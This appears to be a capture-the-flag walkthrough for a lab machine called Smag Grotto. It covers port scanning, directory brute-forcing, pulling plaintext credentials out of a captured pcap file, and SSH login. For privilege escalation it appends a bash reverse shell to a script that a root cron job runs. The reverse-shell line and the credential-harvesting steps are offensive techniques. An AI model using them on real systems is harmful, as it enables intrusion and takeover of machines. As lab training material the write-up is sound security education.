🔗 Smag Grotto
Task 1 - Deploy the machine
🎯 Target IP: 10.10.137.60
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
Copy su
echo "10.10.71.2 smag.thm" >> /etc/hosts
mkdir thm/smag.thm
cd thm/smag.thm
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
Copy ping -c 3 smag.thm
PING smag.thm (10.10.71.2) 56( 84 ) bytes of data.
64 bytes from smag.thm (10.10.71.2): icmp_seq = 2 ttl = 63 time = 97.3 ms
64 bytes from smag.thm (10.10.71.2): icmp_seq = 3 ttl = 63 time = 68.6 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.
2.1 - What is the secret spicy soup recipe?
Of course, start to check information scanning open ports:
Copy nmap --open -p0- -n -Pn -vvv --min-rate 5000 smag.thm -oG nmap/port_scan
Copy Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 18:24 EDT
Initiating SYN Stealth Scan at 18:24
Scanning smag.thm (10.10.71.2) [ 65536 ports]
Discovered open port 80/tcp on 10.10.71.2
Discovered open port 22/tcp on 10.10.71.2
Completed SYN Stealth Scan at 18:24, 18.21s elapsed (65536 total ports )
Nmap scan report for smag.thm (10.10.71.2)
Host is up, received user-set (1.8s latency ).
Scanned at 2023-07-31 18:24:20 EDT for 19s
Not shown: 59890 closed tcp ports (reset), 5644 filtered tcp ports ( no-response )
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
It looks like there are 2 open ports on the machine: 22, 80.
Now, we need to search which services are running on open ports:
Copy nmap -p22,80 -n -Pn -vvv -sCV --min-rate 5000 smag.thm -oN nmap/open_port
We can start to explore website (80):
we see that website is under development, it means that can be vulnerabilities, try to explore source code:
Nothing of interesting! We can try to use gobuster to search hidden paths:
Copy gobuster dir -u http://smag.thm/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
Copy ===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://smag.thm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/07/31 18:35:16 Starting gobuster in directory enumeration mode
===============================================================
/mail (Status: 301 ) [Size: 303] [-- > http://smag.thm/mail/]
Progress: 87664 / 87665 (100.00%)
===============================================================
2023/07/31 18:45:07 Finished
===============================================================
We find 'only' this good path: http:\\smag.thm/mail
Give focus on this .pcap file (wireshark extension), how first paragraph suggests, we can download all attachments using wget command.
We can open file downloaded using wireshark or command strings:
Copy strings dHJhY2Uy.pcap
There's a fantastic info: username=helpdesk&password=cH4nG3M3_n0w
We can use this credentials to try ssh access:
Copy ssh helpdesk@smag.thm
Task 3 - What is the user flag?
We quickly try to find user.txt flag using find command:
🚩 Flag 1 (user.txt)Task 4 - What is the root flag?
We can continue to explore files:
Copy ls -lah *
-rw-r--r-- 1 lennie lennie 38 Nov 12 2020 user.txt
Documents:
total 20K
drwxr-xr-x 2 lennie lennie 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rw-r--r-- 1 root root 139 Nov 12 2020 concern.txt
-rw-r--r-- 1 root root 47 Nov 12 2020 list.txt
-rw-r--r-- 1 root root 101 Nov 12 2020 note.txt
scripts:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 May 15 13:38 startup_list.txt
cat scripts/*
cat Documents/*
cat /etc/print.sh
ls -lah /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
We see that planner.sh will be run as root (with a cron job), and use /etc/print.sh with lennie permission, we can modify it inserting a reverse shell as payload:
Copy echo "/bin/bash -i >& /dev/tcp/10.9.80.228/666 0>&1" >> /etc/print.sh
Then, we run on our kali machine netcat on the same port (666):
and wait root that will run the planner.sh script once a minute.
Well done! We find root flag:
🚩 Flag 2 (root.txt)